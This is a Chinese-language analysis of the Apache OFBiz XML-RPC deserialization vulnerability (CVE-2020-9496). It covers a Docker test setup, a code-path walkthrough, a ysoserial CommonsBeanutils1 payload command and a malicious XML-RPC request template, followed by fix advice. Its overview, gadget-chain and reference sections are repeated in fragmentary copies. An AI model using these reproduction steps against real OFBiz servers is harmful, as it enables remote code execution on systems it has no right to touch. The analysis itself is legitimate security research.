Apache Ofbiz XML-RPC 反序列化漏洞分析 (CVE-2020-9496)<\/h1>

漏洞概述<\/h2>
Apache Ofbiz 是一个开源的企业资源规划(ERP)系统，其 `\/webtools\/control\/xmlrpc<\/code> 接口存在XML-RPC反序列化漏洞(CVE-2020-9496)，攻击者可通过构造恶意XML请求实现远程代码执行。<\/p>`

环境搭建<\/h2>
使用Docker快速搭建测试环境：<\/p>
docker pull andyjunghans\/ofbiz
<\/span><\/span>docker run -p 8080:8080 -p 8443:8443 andyjunghans\/ofbiz
<\/span><\/span><\/code><\/pre>漏洞分析<\/h2>
路由机制分析<\/h3>

请求入口为 \/webtools\/control\/xmlrpc<\/code><\/li>
路由处理由 framework\/webtools\/webapp\/webtools\/WEB-INF\/web.xml<\/code> 定义<\/li>
control<\/code> 路径由 org.apache.ofbiz.webapp.control.ControlServlet<\/code> 处理<\/li>
请求最终由 XmlRpcEventHandler<\/code> 类处理<\/li>
<\/ol>
关键处理流程<\/h3>

ControlServlet<\/code> 调用 requestHandler.doRequest<\/code><\/li>
从 controller.xml<\/code> 获取路由配置<\/li>
根据 event.type<\/code> 选择对应的 EventHandler<\/code><\/li>
对于 xmlrpc<\/code> 请求，使用 XmlRpcEventHandler<\/code> 处理<\/li>
<\/ol>
漏洞触发点<\/h3>

XmlRpcEventHandler<\/code> 调用 execute<\/code> 方法<\/li>
使用 XmlRpcRequestParser<\/code> 解析XML输入<\/li>
当XML中包含 serializable<\/code> 参数时，触发反序列化操作<\/li>
反序列化过程：

首先由 ByteArrayParser<\/code> 进行base64解码<\/li>
然后由 SerializableParser<\/code> 执行反序列化<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞复现<\/h2>
利用链选择<\/h3>
Ofbiz中存在CommonsBeanutils1利用链<\/p>
生成Payload<\/h3>

使用ysoserial生成反序列化数据并base64编码：<\/li>
<\/ol>
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "命令"<\/span> | base64 | tr -d '\n'<\/span>
<\/span><\/span><\/code><\/pre>
构造恶意XML请求：<\/li>
<\/ol>
<?xml version="1.0"?><\/span>
<\/span><\/span><methodCall><\/span>
<\/span><\/span>  <methodName><\/span>测试<\/methodName><\/span>
<\/span><\/span>  <params><\/span>
<\/span><\/span>    <param><\/span>
<\/span><\/span>      <value><\/span>
<\/span><\/span>        <serializable><\/span>[base64编码的反序列化数据]<\/serializable><\/span>
<\/span><\/span>      <\/value><\/span>
<\/span><\/span>    <\/param><\/span>
<\/span><\/span>  <\/params><\/span>
<\/span><\/span><\/methodCall><\/span>
<\/span><\/span><\/code><\/pre>
发送到目标地址 \/webtools\/control\/xmlrpc<\/code><\/li>
<\/ol>
修复建议<\/h2>

升级到最新版本Apache Ofbiz<\/li>
禁用或限制对 \/webtools\/control\/xmlrpc<\/code> 的访问<\/li>
实施输入验证和过滤<\/li>
使用安全配置限制反序列化操作<\/li>
<\/ol>
技术要点总结<\/h2>

漏洞根源在于XML-RPC接口对不可信数据的反序列化<\/li>
利用CommonsBeanutils1链实现RCE<\/li>
需要base64编码反序列化数据<\/li>
通过 serializable<\/code> 标签触发漏洞<\/li>
完整的利用需要构造符合XML-RPC规范的请求<\/li>
<\/ol>
参考链接<\/h2>

官方漏洞公告：https:\/\/securitylab.github.com\/advisories\/GHSL-2020-069-apache_ofbiz<\/li>
Apache Ofbiz官网：https:\/\/ofbiz.apache.org\/<\/li>
XML-RPC规范文档<\/li>
<\/ul>

Apache Ofbiz XML-RPC 反序列化漏洞分析 (CVE-2020-9496)<\/h1>

漏洞概述<\/h2> Apache Ofbiz 是一个开源的企业资源规划(ERP)系统，其 \/webtools\/control\/xmlrpc<\/code> 接口存在XML-RPC反序列化漏洞(CVE-2020-9496)，攻击者可通过构造恶意XML请求实现远程代码执行。<\/p>

漏洞分析<\/h2>

漏洞复现<\/h2>

利用链选择<\/h3> Ofbiz中存在CommonsBeanutils1利用链<\/p>

参考链接<\/h2> 官方漏洞公告：https:\/\/securitylab.github.com\/advisories\/GHSL-2020-069-apache_ofbiz<\/li> Apache Ofbiz官网：https:\/\/ofbiz.apache.org\/<\/li> XML-RPC规范文档<\/li> <\/ul>

漏洞概述<\/h2>
Apache Ofbiz 是一个开源的企业资源规划(ERP)系统，其 `\/webtools\/control\/xmlrpc<\/code> 接口存在XML-RPC反序列化漏洞(CVE-2020-9496)，攻击者可通过构造恶意XML请求实现远程代码执行。<\/p>`

利用链选择<\/h3>
Ofbiz中存在CommonsBeanutils1利用链<\/p>

参考链接<\/h2>

官方漏洞公告：https:\/\/securitylab.github.com\/advisories\/GHSL-2020-069-apache_ofbiz<\/li>
Apache Ofbiz官网：https:\/\/ofbiz.apache.org\/<\/li>
XML-RPC规范文档<\/li> <\/ul>